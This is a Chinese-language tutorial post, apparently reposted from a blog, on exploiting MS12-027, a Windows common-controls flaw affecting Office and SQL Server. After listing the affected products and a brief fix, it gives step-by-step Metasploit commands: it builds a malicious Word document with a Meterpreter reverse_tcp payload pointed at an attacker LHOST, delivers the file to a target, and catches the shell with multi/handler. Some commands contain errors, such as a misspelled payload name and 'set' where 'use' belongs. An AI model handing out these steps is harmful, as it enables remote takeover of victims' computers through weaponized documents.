利用恶意office文档得shell

本文介绍MS12-027漏洞及其影响的Microsoft产品,包括Office和SQL Server等,并提供利用Metasploit框架进行漏洞攻击的详细步骤。

Ms 12_027 微软 windows常用控件中的漏洞

!!!!!!!!!!!!!!!!!!!!

对其默认安装中的包括windows常用控件的所有受支持的microsoft软件

包括 microsoft office2003、microsoft office2007的所有受支持版本;Micrsoft office2010(基于行x64版本除外)Microsoft SQL Server 2000 Analysis Services、Microsoft SQL Server 2000(基于 Itanium 的版本除外)、Microsoft SQL Server 2005(Microsoft SQL Server 2005 Express Edition 除外,但是包括 Microsoft SQL Server 2005 Express Edition with Advanced Services)、Microsoft SQL Server 2008、Microsoft SQL Server 2008 R2、Microsoft BizTalk Server 2002、Microsoft Commerce Server 2002、Microsoft Commerce Server 2007、Microsoft Commerce Server 2009、Microsoft Commerce Server 2009 R2、Microsoft Visual FoxPro 8.0、Microsoft Visual FoxPro 9.0 和 Visual Basic 6.0 Runtime

解决方案:禁用windows常用控件的容易受攻击版本,并将其替换为不包含漏洞的新版本来解决漏洞。

!!!!!!!!!!!!!!!!!!!!

漏洞利用:

1、首先打开metasploit,并进入msf控制台:

 

2、使用漏洞利用模块ms12_027_mscomctl_bof

use exploit/windows/fileformat/ms12_027_mscomctl_bof

3、添加payload,并查看配置需求

set payload windows/metepreter/reverse_tcp

show options

4、设置  LHOST

set LHOST 192.168.207.134

5、生成恶意文件,为方便查看,特将文件复制到桌面上;

exploit

cp /root/.msf5/local/msf.doc /root/Desktop/

6、将生成的文件,传到目标靶机上

7、设置利用exploit/multi/handler模块 (后门)

set exploit/multi/handler

8、添加payload

set payload windows/metepreter/reverse_tcp

9、配置LHOST

10、exploit,等待目标上线~!

11、在目标主机上打开恶意office文件

12、漏洞利用成功

 

转载于:https://www.cnblogs.com/freem/p/6493363.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值